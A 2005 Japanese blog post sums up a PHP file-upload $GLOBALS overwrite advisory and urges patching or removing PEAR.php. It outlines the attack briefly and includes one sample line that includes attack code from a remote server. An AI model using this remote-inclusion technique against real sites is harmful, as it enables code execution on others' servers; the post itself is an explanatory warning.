アカラボ: PHPに“最悪”のセキュリティ・ホール

2005年11月02日

というニュースがでています。
かなり緊張感高まる見出しですが、夕方の記事ではこんな感じ。

元記事「Advisory 20/2005: PHP File-Upload $GLOBALS Overwrite Vulnerability」を解釈して注意点を列挙してみるとこんな感じでしょうか。

　・ファイルのアップロード機能が無いWebサイトも影響を受けます
　　　　ファイルアップロードに起因した不具合ですがどんなWebサイトも対象になります。
　　　　（ローカルでファイルアップロードの POST コードを作って、攻撃サイトに投げればＯＫ）

　・PEAR を使っていると危険度が増します。
　　　　PEAR に限らず、オープンソースなライブラリを使っていると、攻撃箇所を探される可能性
　　　　があります（PEAR や vBulletin は簡単に攻撃できるところがあるとのこと）。

簡単なんで書いてしまいますが PHP で

include("http://myserver.com/attackcode.php");

というような外部ソースを include することが許可されていて、PEAR では一部の include パスを Global 変数で指定するようなコードが含まれているとのこと。

で、File-Upload を投げて Global 変数を書き換えてしまえば・・・orz. という感じです（と思う）。

PEAR.php を使っていなければ削除したほうがいいですし、使っているなら早急なパッチ当てを検討したほうがいいでしょう。

そうでないサイトも、できるだけパッチ当てを、という感じです。

＃ニュースタイトルにびっくりしてバタバタ調べましたので、間違いあればご指摘ください ^^;

管理人の運営サービス：

メッセンジャー -- 会議室型メッセンジャー : フレッシュミーティング

RSS配信サイト -- あらゆるサイトのRSSを配信：My RSS.jp

ブログSEO対策 -- ブログ専用。検索エンジンのアクセス解析に：トラックワード

RSSリーダー -- リーダーだけの快速RSSリーダー：フレッシュリーダー

人気ブログランキング -- ブログの更新頻度と人気度を測定：フィードメーター

リンク元アクセス解析 -- リンクが張られた瞬間にRSSで通知するアクセス解析：トラックフィード

ブログRSS検索 -- 旬な情報をお届けします：フレッシュフィード

RSS配信・作成 -- オンラインでRSSを作成・配信・分析できるサービス：RSSフィード.cc

RSSリンク集 -- RSSの簡単リンク集：RSSリンク集

ブックマーク -- メールでブックマークを実現：あとで読む

bookmark -- an email based bookmark service：toread.cc

RSSとは -- RSSに関する情報が満載のサイトです

投稿者 aka : 日時 2005年11月02日 18:43

このエントリーのトラックバックURL:
http://210.188.206.194/mt-tb-sf.cgi/258